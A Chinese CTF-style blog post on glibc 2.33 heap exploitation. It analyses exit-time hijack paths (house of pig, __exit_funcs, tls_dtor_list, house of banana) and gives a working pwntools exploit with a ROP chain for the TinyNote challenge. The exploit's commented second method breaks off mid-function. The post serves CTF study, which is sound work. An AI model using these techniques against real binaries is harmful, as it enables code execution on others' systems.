Glibc 2.33怎么玩？

一些新增机制

safe-linking

从Glibc 2.32开始，对tcache单向链表引入safe-linking的保护机制：

/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache;

  e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

且从Glibc 2.33开始，safe-linking也被应用到fastbin中。

这样其实并没有给利用带来很大的影响，甚至更加容易leak heap address（只需要free一个chunk）。

tcache alignment

在Glibc 2.31及以前，tcache poisoning可以完成任意地址分配，但是从Glibc 2.32开始，多了一个check，及tcache chunk也需要0x10对齐：

/* Caller must ensure that we know tc_idx is valid and there's
   available chunks to remove.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  if (__glibc_unlikely (!aligned_OK (e)))
    malloc_printerr ("malloc(): unaligned tcache chunk detected");
  tcache->entries[tc_idx] = REVEAL_PTR (e->next);
  --(tcache->counts[tc_idx]);
  e->key = NULL;
  return (void *) e;
}

利用技巧

目前总结的利用技巧主要分为三种：

_IO_FILE
__exit_funcs
tls_dtor_list
link_map

下文的出发点在于已经获得一些primitive可以通过堆利用，完成对一些内存地址的读写，如利用fastbin reverse into tcache或者large bin attack向某个地址写入堆地址等。

_IO_FILE

house of pig

从源码的角度上深入分析house of pig整个利用链：

首先不论是程序正常从__libc_start_main中返回时，还是从显式提供的exit中返回，抑或是abort（有待考证），其原理都是最终需要调用_IO_flush_all_lockp。

以exit举例：

/* Call all functions registered with `atexit' and `on_exit',
   in the reverse of the order in which they were registered
   perform stdio cleanup, and terminate program execution with STATUS.  */
void
attribute_hidden
__run_exit_handlers (int status, struct exit_function_list **listp,
		     bool run_list_atexit, bool run_dtors)
{
  /* First, call the TLS destructors.  */
#ifndef SHARED
  if (&__call_tls_dtors != NULL)
#endif
    if (run_dtors)
      __call_tls_dtors ();

  /* We do it this way to handle recursive calls to exit () made by
     the functions registered with `atexit' and `on_exit'. We call
     everyone on the list and use the status value in the last
     exit (). */
  while (true)
    {
      struct exit_function_list *cur;

      __libc_lock_lock (__exit_funcs_lock);

    restart:
      cur = *listp;

      if (cur == NULL)
	{
	  /* Exit processing complete.  We will not allow any more
	     atexit/on_exit registrations.  */
	  __exit_funcs_done = true;
	  __libc_lock_unlock (__exit_funcs_lock);
	  break;
	}

      while (cur->idx > 0)
	{
	  struct exit_function *const f = &cur->fns[--cur->idx];
	  const uint64_t new_exitfn_called = __new_exitfn_called;

	  /* Unlock the list while we call a foreign function.  */
	  __libc_lock_unlock (__exit_funcs_lock);
	  switch (f->flavor)
	    {
	      void (*atfct) (void);
	      void (*onfct) (int status, void *arg);
	      void (*cxafct) (void *arg, int status);

	    case ef_free:
	    case ef_us:
	      break;
	    case ef_on:
	      onfct = f->func.on.fn;
#ifdef PTR_DEMANGLE
	      PTR_DEMANGLE (onfct);
#endif
	      onfct (status, f->func.on.arg);
	      break;
	    case ef_at:
	      atfct = f->func.at;
#ifdef PTR_DEMANGLE
	      PTR_DEMANGLE (atfct);
#endif
	      atfct ();
	      break;
	    case ef_cxa:
	      /* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
		 we must mark this function as ef_free.  */
	      f->flavor = ef_free;
	      cxafct = f->func.cxa.fn;
#ifdef PTR_DEMANGLE
	      PTR_DEMANGLE (cxafct);
#endif
	      cxafct (f->func.cxa.arg, status);
	      break;
	    }
	  /* Re-lock again before looking at global state.  */
	  __libc_lock_lock (__exit_funcs_lock);

	  if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
	    /* The last exit function, or another thread, has registered
	       more exit functions.  Start the loop over.  */
	    goto restart;
	}

      *listp = cur->next;
      if (*listp != NULL)
	/* Don't free the last element in the chain, this is the statically
	   allocate element.  */
	free (cur);

      __libc_lock_unlock (__exit_funcs_lock);
    }

  if (run_list_atexit)
    RUN_HOOK (__libc_atexit, ());

  _exit (status);
}


void
exit (int status)
{
  __run_exit_handlers (status, &__exit_funcs, true, true);
}
libc_hidden_def (exit)

不论__run_exit_handlers中间通过__exit_funcs结构做了多少相关操作，exit最终都会进入下面这段逻辑：

1 2	if (run_list_atexit) RUN_HOOK (__libc_atexit, ());

由于run_list_atexit是__run_exit_handlers的第三个参数，为true，那么一定会调用这个HOOK函数。

那么这个HOOK函数是什么，结合IDA以及GDB，可以发现它其实是_IO_cleanup：

__libc_atexit:00000000001E2608
__libc_atexit:00000000001E2608 ; Segment type: Pure data
__libc_atexit:00000000001E2608 ; Segment permissions: Read/Write
__libc_atexit:00000000001E2608 __libc_atexit   segment qword public 'DATA' use64
__libc_atexit:00000000001E2608                 assume cs:__libc_atexit
__libc_atexit:00000000001E2608                 ;org 1E2608h
__libc_atexit:00000000001E2608 off_1E2608      dq offset _IO_cleanup   ; DATA XREF: __run_exit_handlers+1DA↑o
__libc_atexit:00000000001E2608                                         ; sub_59840+1642↑o ...
__libc_atexit:00000000001E2608 __libc_atexit   ends
__libc_atexit:00000000001E2608

这个_IO_cleanup就会执行我们所需要的_IO_flush_all_lockp：

int
_IO_cleanup (void)
{
  /* We do *not* want locking.  Some threads might use streams but
     that is their problem, we flush them underneath them.  */
  int result = _IO_flush_all_lockp (0);

  /* We currently don't have a reliable mechanism for making sure that
     C++ static destructors are executed in the correct order.
     So it is possible that other static destructors might want to
     write to cout - and they're supposed to be able to do so.

     The following will make the standard streambufs be unbuffered,
     which forces any output from late destructors to be written out. */
  _IO_unbuffer_all ();

  return result;
}

那么，_IO_flush_all_lockp又干了什么，通过这个调用我们能怎样完成利用：

int
_IO_flush_all_lockp (int do_lock)
{
  int result = 0;
  FILE *fp;

#ifdef _IO_MTSAFE_IO
  _IO_cleanup_region_start_noarg (flush_cleanup);
  _IO_lock_lock (list_all_lock);
#endif

  for (fp = (FILE *) _IO_list_all; fp != NULL; fp = fp->_chain)
    {
      run_fp = fp;
      if (do_lock)
	_IO_flockfile (fp);

      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
	   || (_IO_vtable_offset (fp) == 0
	       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
				    > fp->_wide_data->_IO_write_base))
	   )
	  && _IO_OVERFLOW (fp, EOF) == EOF)
	result = EOF;

      if (do_lock)
	_IO_funlockfile (fp);
      run_fp = NULL;
    }

#ifdef _IO_MTSAFE_IO
  _IO_lock_unlock (list_all_lock);
  _IO_cleanup_region_end (0);
#endif

  return result;
}

可以很清楚地看到，该函数地逻辑可以简单地理解为通过_IO_list_all（实际上指向_IO_2_1_stderr_），遍历标准错误、输出、输入流，根据情况调用_IO_OVERFLOW(fp, EOF)刷新相应流缓冲区。

考虑到利用场景下，我们可以劫持_IO_list_all，或者stderr，stdout，stdin的_chain成员，从而引入一个fake _IO_FILE结构体（记为fake_fp）。

在满足如下两种条件之一的情况下：（显然第一个条件更为简单）

fake_fp->_mode <= 0：
- fake_fp->_IO_write_ptr > fake_fp->_IO_write_base：
fake_fp->_mode > 0：
- fake_fp->_vtable_offset = 0 && fake_fp->_wide_data->_IO_write_ptr > fake_fp->_wide_data->_IO_write_base

会调用fake_fp->_vtable->_IO_overflow_t即vtable + 0x18处的指针指向的函数，且第一个参数为fake_fp自身。

再考虑从Glibc 2.24开始引入的vtable check，可以实现调用任意vtable中的任意函数指针。

而house of pig即是在这个基础上，使得fake_fp->vtable = _IO_str_jumps，那么实际调用的_IO_overflow_t为_IO_str_overflow：

int
_IO_str_overflow (FILE *fp, int c)
{
  int flush_only = c == EOF;
  size_t pos;
  if (fp->_flags & _IO_NO_WRITES)
      return flush_only ? 0 : EOF;
  if ((fp->_flags & _IO_TIED_PUT_GET) && !(fp->_flags & _IO_CURRENTLY_PUTTING))
    {
      fp->_flags |= _IO_CURRENTLY_PUTTING;
      fp->_IO_write_ptr = fp->_IO_read_ptr;
      fp->_IO_read_ptr = fp->_IO_read_end;
    }
  pos = fp->_IO_write_ptr - fp->_IO_write_base;
  if (pos >= (size_t) (_IO_blen (fp) + flush_only))
    {
      if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
	return EOF;
      else
	{
	  char *new_buf;
	  char *old_buf = fp->_IO_buf_base;
	  size_t old_blen = _IO_blen (fp);
	  size_t new_size = 2 * old_blen + 100;
	  if (new_size < old_blen)
	    return EOF;
	  new_buf = malloc (new_size);
	  if (new_buf == NULL)
	    {
	      /*	  __ferror(fp) = 1; */
	      return EOF;
	    }
	  if (old_buf)
	    {
	      memcpy (new_buf, old_buf, old_blen);
	      free (old_buf);
	      /* Make sure _IO_setb won't try to delete _IO_buf_base. */
	      fp->_IO_buf_base = NULL;
	    }
	  memset (new_buf + old_blen, '\0', new_size - old_blen);

	  _IO_setb (fp, new_buf, new_buf + new_size, 1);
	  fp->_IO_read_base = new_buf + (fp->_IO_read_base - old_buf);
	  fp->_IO_read_ptr = new_buf + (fp->_IO_read_ptr - old_buf);
	  fp->_IO_read_end = new_buf + (fp->_IO_read_end - old_buf);
	  fp->_IO_write_ptr = new_buf + (fp->_IO_write_ptr - old_buf);

	  fp->_IO_write_base = new_buf;
	  fp->_IO_write_end = fp->_IO_buf_end;
	}
    }

  if (!flush_only)
    *fp->_IO_write_ptr++ = (unsigned char) c;
  if (fp->_IO_write_ptr > fp->_IO_read_end)
    fp->_IO_read_end = fp->_IO_write_ptr;
  return c;
}
libc_hidden_def (_IO_str_overflow)

这里的malloc，memcpy和free就是关键所在，即等价于执行了：

ptr = malloc((fake_fp->_IO_buf_end - fake_fp->_IO_buf_base) * 2 + 100)
memcpy(ptr, fake_fp->_IO_buf_base, fake_fp->_IO_buf_end - fake_fp->_IO_buf_base)
free(ptr)

同时注意到，这里存在一个限制：

int flush_only = c == EOF;
...
pos = fp->_IO_write_ptr - fp->_IO_write_base;
if (pos >= (size_t) (_IO_blen (fp) + flush_only))
{
    if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
		return EOF;
    else
    {
        ... // need to be here
    }
}

即fake_fp->_IO_write_ptr - fake_fp->_IO_write_base > fake_fp->_IO_buf_end - fake_fp->_IO_buf_base，以及fake_fp->_flags & _IO_USER_BUF == 0。

做个小小的总结，伪造的_IO_FILE只要满足：

_flags & _IO_USER_BUF == 0
_mode <= 0
_IO_write_ptr - _IO_write_base > _IO_buf_end - _IO_buf_base
vtable = _IO_str_jumps （或者其他含有_IO_str_overflow指针的vtable）

就可以愉快地调用malloc，memcpy和free了。

__exit_funcs

上面在分析exit的时候，跳过了__exit_funcs的逻辑，实际上，__exit_funcs作为libc中的全局变量，是可以被修改的：

void
exit (int status)
{
  __run_exit_handlers (status, &__exit_funcs, true, true);
}
libc_hidden_def (exit)

首先，关注一下__exit_funcs里，存的到底是个什么东西，实际上，它存放了一个exit_function_list结构体指针：

struct exit_function_list
{
    struct exit_function_list *next;
    size_t idx;
    struct exit_function fns[32];
};

struct exit_function
{
    /* `flavour' should be of type of the `enum' above but since we need
       this element in an atomic operation we have to use `long int'.  */
    long int flavor;
    union
    {
        void (*at) (void);
        struct
        {
            void (*fn) (int status, void *arg);
            void *arg;
        } on;
        struct
        {
            void (*fn) (void *arg, int status);
            void *arg;
            void *dso_handle;
        } cxa;
    } func;
};

其中，毋庸置疑，next成员组织了一条单向链表，它遍历的行为，就是在每轮循环后，用next覆盖__exit_funcs：（不过不是很重要）

1	*listp = cur->next; // listp = &__exit_funcs

关键在于，idx指明了exit_function的数量，且会从后往前遍历exit_functions数组，并根据其中的flavor成员进行相应的函数调用：

switch (f->flavor)
{
    void (*atfct) (void);
    void (*onfct) (int status, void *arg);
    void (*cxafct) (void *arg, int status);

    case ef_free: // 0
    case ef_us:   // 1
      break;
    case ef_on:   // 2
      onfct = f->func.on.fn;
#ifdef PTR_DEMANGLE
      PTR_DEMANGLE (onfct);
#endif
      onfct (status, f->func.on.arg);
      break;
    case ef_at:   // 3
      atfct = f->func.at;
#ifdef PTR_DEMANGLE
      PTR_DEMANGLE (atfct);
#endif
      atfct ();
      break;
    case ef_cxa:  // 4
      /* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
     we must mark this function as ef_free.  */
      f->flavor = ef_free;
      cxafct = f->func.cxa.fn;
#ifdef PTR_DEMANGLE
      PTR_DEMANGLE (cxafct);
#endif
      cxafct (f->func.cxa.arg, status);
      break;
}

不难想到，如果我们劫持__exit_funcs，设置其idx = 1，然后相应地设置fns[0]，就可以完成任意函数调用了，如果关注一下case ef_cxa的情况，甚至函数的第一个参数都是可控的。

然而事实却并非那么简单，注意到：

#ifdef PTR_DEMANGLE
      PTR_DEMANGLE (cxafct);
#endif

/* Pointer mangling support.  */
#if IS_IN (rtld)
/* We cannot use the thread descriptor because in ld.so we use setjmp
   earlier than the descriptor is initialized.  */
# ifdef __ASSEMBLER__
#  define PTR_MANGLE(reg)	xor __pointer_chk_guard_local(%rip), reg;    \
				rol $2*LP_SIZE+1, reg
#  define PTR_DEMANGLE(reg)	ror $2*LP_SIZE+1, reg;			     \
				xor __pointer_chk_guard_local(%rip), reg
# else
#  define PTR_MANGLE(reg)	asm ("xor __pointer_chk_guard_local(%%rip), %0\n" \
				     "rol $2*" LP_SIZE "+1, %0"			  \
				     : "=r" (reg) : "0" (reg))
#  define PTR_DEMANGLE(reg)	asm ("ror $2*" LP_SIZE "+1, %0\n"		  \
				     "xor __pointer_chk_guard_local(%%rip), %0"   \
				     : "=r" (reg) : "0" (reg))
# endif
#else
# ifdef __ASSEMBLER__
#  define PTR_MANGLE(reg)	xor %fs:POINTER_GUARD, reg;		      \
				rol $2*LP_SIZE+1, reg
#  define PTR_DEMANGLE(reg)	ror $2*LP_SIZE+1, reg;			      \
				xor %fs:POINTER_GUARD, reg
# else
#  define PTR_MANGLE(var)	asm ("xor %%fs:%c2, %0\n"		      \
				     "rol $2*" LP_SIZE "+1, %0"		      \
				     : "=r" (var)			      \
				     : "0" (var),			      \
				       "i" (offsetof (tcbhead_t,	      \
						      pointer_guard)))
#  define PTR_DEMANGLE(var)	asm ("ror $2*" LP_SIZE "+1, %0\n"	      \
				     "xor %%fs:%c2, %0"			      \
				     : "=r" (var)			      \
				     : "0" (var),			      \
				       "i" (offsetof (tcbhead_t,	      \
						      pointer_guard)))
# endif
#endif

简单来说，这里存在一个指针加解密的操作，即f->func.cxa.fn是被加密过的，如果直接写入目标地址，那么显然会SSEGV。

但是考虑得更深一步的话，会发现，这个加密操作ror(ptr, 17) ^ fs:[0x30]中，fs:[0x30]位于TLS处，是完全可写的位置，如果将其修改为一个已知值，那么指针加密的问题就迎刃而解了。

如何定位到TLS的位置，实际上本地环境和远程环境往往存在差异，但是空间并不大，爆破是完全可取的

至于如何在本地定位到这个fs:[0x30]，目前我的做法是：

注意到在ld中执行相应逻辑时，PTR_DEMANGEL的宏定义中，取得不是fs:[0x30]，而是__pointer_chk_guard_local

因此，完全可以先读到__pointer_chk_guard_local，然后在内存中搜索即可，因为两者值是完全一致的

解决这个问题之后，那么只要设置好加密指针和函数，目的就已经达到了。

同样做个小小的总结，伪造的__exit_funcs可以满足：

idx = 1
fns[0].flavor = ef_cxa
fns[1].func.cxa.fn = rol(fs:[0x30] ^ system, 17)
fns[1].func.cxa.arg = &str_bin_sh

就可以在exit的时候，调用system("/bin/sh")了；当然，如果要orw的话，做相应的修改即可，这点与打__free_hook应该没什么区别。

tls_dtor_list

不小心忽略了__run_exit_handlers中，最开始的一部分代码了：

  /* First, call the TLS destructors.  */
#ifndef SHARED
    if (&__call_tls_dtors != NULL)
#endif
    if (run_dtors)
      __call_tls_dtors ();

首先从传参的角度，run_dtors = true，必然进入到__call_tls_dtors中；且从注释里面可以看到，这其实是要对TLS进行析构。

深入分析__call_tls_dtors：

static __thread struct dtor_list *tls_dtor_list;

/* Call the destructors.  This is called either when a thread returns from the
   initial function or when the process exits via the exit function.  */
void
__call_tls_dtors (void)
{
  while (tls_dtor_list)
    {
      struct dtor_list *cur = tls_dtor_list;
      dtor_func func = cur->func;
#ifdef PTR_DEMANGLE
      PTR_DEMANGLE (func);
#endif

      tls_dtor_list = tls_dtor_list->next;
      func (cur->obj);

      /* Ensure that the MAP dereference happens before
	 l_tls_dtor_count decrement.  That way, we protect this access from a
	 potential DSO unload in _dl_close_worker, which happens when
	 l_tls_dtor_count is 0.  See CONCURRENCY NOTES for more detail.  */
      atomic_fetch_add_release (&cur->map->l_tls_dtor_count, -1);
      free (cur);
    }
}
libc_hidden_def (__call_tls_dtors)

简单明了，tls_dtor_list存放在TLS上，且处于可写的地址处，如果能够劫持tls_dtor_list，就可以任意函数调用了，且第一个参数同样可控：

typedef void (*dtor_func) (void *);

struct dtor_list
{
  dtor_func func;
  void *obj;
  struct link_map *map;
  struct dtor_list *next;
};

同样的问题是，该指针仍然是被加密的，如果能够修改fs:[0x30]的值，同样可以完成bypass。

link_map

来自安全客的一篇house of banana，利用核心在于劫持_rtld_global的link_map结构，同样是因为这篇house of banana虽然给了poc，但是原理还是得弄清楚，虽然可能不常用，但是说不定什么时候就派上用场了。

_rtld_global作为一个ld中的全局变量，它是一个rtld_global结构体，但如果要从结构体入手分析，则过于复杂，因此选择从被引函数分析入手。

那么问题在于，_rtld_global在哪里被调用了，实际上，它是通过exit中，解析__exit_funcs后调用的_dl_fini中被调用的，如果直接在_dl_fini中下断点，不难根据调用栈定位到。

那么，分析一下_dl_fini：（因为过长，所以选择关键部分）

首先第一部分：

 for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns)
    {
      /* Protect against concurrent loads and unloads.  */
      __rtld_lock_lock_recursive (GL(dl_load_lock));

      unsigned int nloaded = GL(dl_ns)[ns]._ns_nloaded;
      /* No need to do anything for empty namespaces or those used for
	 auditing DSOs.  */
      if (nloaded == 0
#ifdef SHARED
	  || GL(dl_ns)[ns]._ns_loaded->l_auditing != do_audit
#endif
	  )
	__rtld_lock_unlock_recursive (GL(dl_load_lock));
      else
	{
	  /* Now we can allocate an array to hold all the pointers and
	     copy the pointers in.  */
	  struct link_map *maps[nloaded];

	  unsigned int i;
	  struct link_map *l;
	  assert (nloaded != 0 || GL(dl_ns)[ns]._ns_loaded == NULL);
	  for (l = GL(dl_ns)[ns]._ns_loaded, i = 0; l != NULL; l = l->l_next)
	    /* Do not handle ld.so in secondary namespaces.  */
	    if (l == l->l_real)
	      {
		assert (i < nloaded);

		maps[i] = l;
		l->l_idx = i;
		++i;

		/* Bump l_direct_opencount of all objects so that they
		   are not dlclose()ed from underneath us.  */
		++l->l_direct_opencount;
	      }
   ...

通常情况下，这里GL(dl_nns)即_rtld_global->_dl_nns = 1，从而引出了我们的目标GL(dl_ns)[ns]._ns_loaded，即_rtld_global->_dl_ns[0]->_ns_loaded这个link_map结构体指针；而这里的逻辑，其实就是通过link_map->l_next遍历单向链表，然后依次放入到maps中。

关键在于第二部分：

#define	DT_FINI_ARRAY	26		/* Array with addresses of fini fct */
#define	DT_INIT_ARRAYSZ	27		/* Size in bytes of DT_INIT_ARRAY */

for (i = 0; i < nmaps; ++i)
{
      struct link_map *l = maps[i];

  	if (l->l_init_called)
	{
  		/* Make sure nothing happens if we are called twice.  */
  		l->l_init_called = 0;

 		 /* Is there a destructor function?  */
  		if (l->l_info[DT_FINI_ARRAY] != NULL
      	|| (ELF_INITFINI && l->l_info[DT_FINI] != NULL))
    	{
     		/* When debugging print a message first.  */
     		if (__builtin_expect (GLRO(dl_debug_mask)
                & DL_DEBUG_IMPCALLS, 0))
    		_dl_debug_printf ("\ncalling fini: %s [%lu]\n\n",
              DSO_FILENAME (l->l_name),
              ns);

      		/* First see whether an array is given.  */
      		if (l->l_info[DT_FINI_ARRAY] != NULL)
    		{
     	 		ElfW(Addr) *array =
   					(ElfW(Addr) *) (l->l_addr
               						 + l->l_info[DT_FINI_ARRAY]->d_un.d_ptr);
      			unsigned int i = (l->l_info[DT_FINI_ARRAYSZ]->d_un.d_val
                / sizeof (ElfW(Addr)));
     			 while (i-- > 0)
        			((fini_t) array[i]) ();
    		}
     ...

简而言之，这段逻辑在通过l->l_info数组中存放的各个setction的位置，定位fini_array数组，并且进行依次调用。

结合struct link_map结构体数据结构，需要伪造以下结构体成员：

_rtld_global->_dl_ns[0]->_ns_loaded: (link map) 
offset           member
0x0              l_addr         (point to program base by default)
0x10             l_next         (point to next link map, the length of the linked list should be 4)
0x20 			 l_real			(point to itself)
0x110            l_info[0x1A]   (
                                    point to fini_array Elf64_Dyn structure:
                                    typedef struct
                                    {
                                    Elf64_Sxword	d_tag;			/* Dynamic entry type */
                                    union
                                        {
                                            Elf64_Xword d_val;		/* Integer value */             
                                            Elf64_Addr d_ptr;	    /* Address value */       
                                        							// l_info[0x1A]->d_un.d_ptr + l_addr = &fini_array
                                        } d_un;
                                    } Elf64_Dyn;)
                                )
0x120            l_info[0x1C]   (point to fini_array_size Elf64_Dyn structure)         // l_info[0x1C]->d_un.d_val = sizeof(fini_array)
0x31C			 l_init_called  (should be no zero)

关于为什么linked list的长度要是4，其实原文章中提到的是需要>=4，但是在调试所给的PoC时，同时结合源码分析，发现只能=4：

这应该是和初始化_rtld_global->_dl_ns->_ns_nloaded的值有关（这里是4），同时满足3个assert：
1
2
3
4
assert (i < nloaded);
...
assert (ns != LM_ID_BASE || i == nloaded);
assert (ns == LM_ID_BASE || i == nloaded || i == nloaded - 1);
故在ns = LM_ID_BASE的情况下（默认如此），满足的约束为i == nloaded。

不过还需具体情况下，进行调试分析得出。

同样小小总结一下，我们主要需要伪造一个link_map结构体，即_rtld_global->_dl_ns[0]->_ns_loaded指向的结构体：

l_addr为基址
l_next维护的单向链表长度为4
l_real为结构体本身，即对于链表中每个link_map节点，其值必须等于本身
l_info[0x1A]为struct Elf64_Dyn *，其指向的结构体需要满足l_info[0x1A]->d_un.d_ptr + l_addr = fake_fini_array
l_info[0x1C]同为struct Elf64_Dyn *，其指向的结构体需要满足l_info[0x1C]->d_un.d_val = sizeof(fake_fini_array)
l_init_called需不为0
fake_fini_array中布置好需要调用的函数指针

那么在程序exit进入_dl_fini后，就能调用目标函数。

示例

西湖论剑2021的TInyNote，这题需要通过fastbin_reverse_into_tcache，来实现“任意”地址写tcache_pthread_struct的地址。
但是，像上面提到的，由于tcache chunk现在需要对齐到0x10，且fd指针是受safe-linking机制保护的指针（值本身是非法地址），所以只能够实现向0x???????????8的位置，写入tcache_pthread_struct的地址。
那么综合考虑以上的利用方案，我们可以修改stderr->_chain，也可以修改__exit_funcs；至于_rtld_global->_dl_ns[0]->_ns_loaded和__call_tls_dtors，都无法修改成合法的地址（因为它们地址都是0x??????????10）。
所以下面的exp主要通过两种方案来实现orw，一种是改stderr->_chain，通过exit触发_IO_flush_all_lockp完成利用；一种是伪造__exit_funcs，不过同样是在exit的时候完成利用。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import sys, os, re

context(arch='amd64', os='linux', log_level='debug')

_proc = os.path.abspath('./TinyNote')
_libc = os.path.abspath('./libc-2.33.so')

libc = ELF(_libc)
elf = ELF(_proc)

_debug = int(sys.argv[1]) if len(sys.argv) > 1 else 0

p = process(argv=[_proc])
if _debug != 0:
    gdb.attach(p)

# menu
choose_items = {
    "add": 1,
    "edit": 2,
    "show": 3,
    "delete": 4,
    "bonus": 5
}

def choose(idx):
    p.sendlineafter("Choice:", str(idx))

def add(idx):
    choose(choose_items['add'])
    p.sendlineafter("Index:", str(idx))

def edit(idx, content):
    choose(choose_items['edit'])
    p.sendlineafter("Index:", str(idx))
    p.sendafter("Content:", content)

def show(idx):
    choose(choose_items['show'])
    p.sendlineafter("Index:", str(idx))

def delete(idx):
    choose(choose_items['delete'])
    p.sendlineafter("Index:", str(idx))

def arbitrary_write(addr, content):
    delete(1)
    edit(0, "\x02")
    edit(1, p64(addr ^ (heap_base >> 12)))
    add(1)
    add(2)
    edit(2, content)

#################################### Method 1: hijack stderr
# leak heap base
add(0)
delete(0)
add(0)
show(0)
p.recvuntil("Content:")
heap_base = u64(p.recv(8)) << 12

# leak libc base
for i in range(0x23):
    add(1)
add(2)
delete(1)
delete(2)
edit(2, p64((heap_base + 0x290) ^ (heap_base >> 12)))
add(1)
add(1)
edit(1, p64(0) + p64(0x421))
delete(0)
add(0)
show(0)
p.recvuntil("Content:")
libc_base = u64(p.recv(8)) - 0x1e0ba0 - 0x450

# malloc tcache_struct
add(1)
delete(0)
delete(1)
edit(1, p64((heap_base + 0x10) ^ (heap_base >> 12)))
add(0)
add(0) # chunk 0 points to tcache_struct

# prepare fastbin
add(1)
for i in range(5):
    add(2)
    edit(2, p64((heap_base + 0x310 + 0x20 * i) ^ (heap_base >> 12)))
add(2)
edit(2, p64((libc_base + libc.sym['_IO_2_1_stderr_'] + 0x68 - 0x18) ^ (heap_base >> 12)))
edit(0, "\x07") # "fill" the tcache bin
delete(1) # put into fastbin
edit(1, p64((heap_base + 0x2F0) ^ (heap_base >> 12))) # prepare for fastbin reverse into tcache attack

# fastbin reverse into tcache attack, this will change stderr->_chain
edit(0, "\x00") # "clear" the tcache bin
add(1)

# forge stdout
edit(0, "\x00") # "clear" the tcache bin
arbitrary_write(heap_base + 0x30, p64(0) + p64(0xFFFFFFFFFFFF)) # _IO_write_base = 0, _IO_write_ptr = 0xFFFF (make sure _IO_write_ptr - _IO_write_base > _IO_buf_end - _IO_buf_base)
arbitrary_write(heap_base + 0x40, p64(0) + p64(heap_base + 0xE00)) # _IO_buf_base = src buffer start
arbitrary_write(heap_base + 0x50, p64(heap_base + 0xE00 + 0xB0)) # _IO_buf_end = source buffer end
arbitrary_write(heap_base + 0xe0, p64(0) + p64(libc_base + 0x1e2560)) # vtable = _IO_str_jumps

# ORW
def orw_payload(libc_base, orwchain_base):
    pop_rdi = libc_base + 0x0000000000028a55 # pop rdi ; ret
    pop_rsi = libc_base + 0x000000000002a4cf # pop rsi ; ret
    pop_rdx = libc_base + 0x00000000000c7f32 # pop rdx ; ret
    func_cnt = 3
    args_cnt = 2 + 3 + 1
    payload = ""
    payload += flat([pop_rdi, orwchain_base + func_cnt * 8 + args_cnt * 0x10, pop_rsi, 0, libc_base + libc.sym['open']])
    payload += flat([pop_rdi, 3, pop_rsi, orwchain_base + 0x100, pop_rdx, 0x40, libc_base + libc.sym['read']])
    payload += flat([pop_rdi, orwchain_base + 0x100, libc_base + libc.sym['puts']])
    payload += "./flag"
    return payload

rdi2rdx = libc_base + 0x000000000014a0a0 # mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
rdx2rsp = libc_base + 0x0000000000059020 # mov rsp, rdx ; ret
add_rsp_0x28 = libc_base + 0x0000000000044ce5 # add rsp, 0x28 ; ret

ropchain_addr = heap_base + 0xE00
ropchain = flat([add_rsp_0x28, ropchain_addr, rdi2rdx, 0, rdx2rsp])
ropchain += p64(0) # padding
ropchain += orw_payload(libc_base, ropchain_addr + 0x30)

for i in range((len(ropchain) + 8) // 0x10):
    arbitrary_write(ropchain_addr + i*0x10, ropchain[i*0x10:(i+1)*0x10])

# prepare buffer for FSOP
arbitrary_write(heap_base + 0x160, p64(0) + p64(libc_base + libc.sym['__free_hook'] - 0x10)) # tcache bin (0x1D0) = &__free_hook - 8
arbitrary_write(heap_base + 0x40, p64(0x1000000000000) + p64(heap_base + 0xE00)) # tcache count (0x1D0) = 1

# clear fastbin
edit(0, "\x07")
delete(1)
edit(1, p64(heap_base >> 12))
edit(0, "\x00")
add(1)

# trigger exit
delete(1)
edit(0, "\x02")
edit(1, p64((heap_base + 0x2000) ^ (heap_base >> 12)))
add(1)
add(2)
####################################


# #################################### Method 2: hijack __exit_funcs
# # leak heap base
# add(0)
# delete(0)
# add(0)
# show(0)
# p.recvuntil("Content:")
# heap_base = u64(p.recv(8)) << 12

# # leak libc base
# for i in range(0x23):
#     add(1)
# add(2)
# delete(1)
# delete(2)
# edit(2, p64((heap_base + 0x290) ^ (heap_base >> 12)))
# add(1)
# add(1)
# edit(1, p64(0) + p64(0x421))
# delete(0)
# add(0)
# show(0)
# p.recvuntil("Content:")
# libc_base = u64(p.recv(8)) - 0x1e0ba0 - 0x450

# # malloc tcache_struct
# add(1)
# delete(0)
# delete(1)
# edit(1, p64((heap_base + 0x10) ^ (heap_base >> 12)))
# add(0)
# add(0) # chunk 0 points to tcache_struct

# # prepare fastbin
# add(1)
# for i in range(5):
#     add(2)
#     edit(2, p64((heap_base + 0x310 + 0x20 * i) ^ (heap_base >> 12)))
# add(2)
# edit(2, p64((libc_base + 0x1ed630 - 0x10) ^ (heap_base >> 12))) # __exit_funcs
# edit(0, "\x07") # "fill" the tcache bin
# delete(1) # put into fastbin
# edit(1, p64((heap_base + 0x2F0) ^ (heap_base >> 12))) # prepare for fastbin reverse into tcache attack

# # fastbin reverse into tcache attack, this will change fs:[0x30] to (heapbase + 0x3a0) ^ ((libc_base + 0x1ed630) >> 12)
# edit(0, "\x00") # "clear" the tcache bin
# add(1)
# __pointer_chk = (heap_base + 0x3a0) ^ ((libc_base + 0x1ed630) >> 12)

# # clear fastbin
# edit(0, "\x07")
# delete(1)
# edit(1, p64(heap_base >> 12))
# edit(0, "\x00")
# add(1)

# # ORW
# def orw_payload(libc_base, orwchain_base):
#     pop_rdi = libc_base + 0x0000000000028a55 # pop rdi ; ret
#     pop_rsi = libc_base + 0x000000000002a4cf # pop rsi ; ret
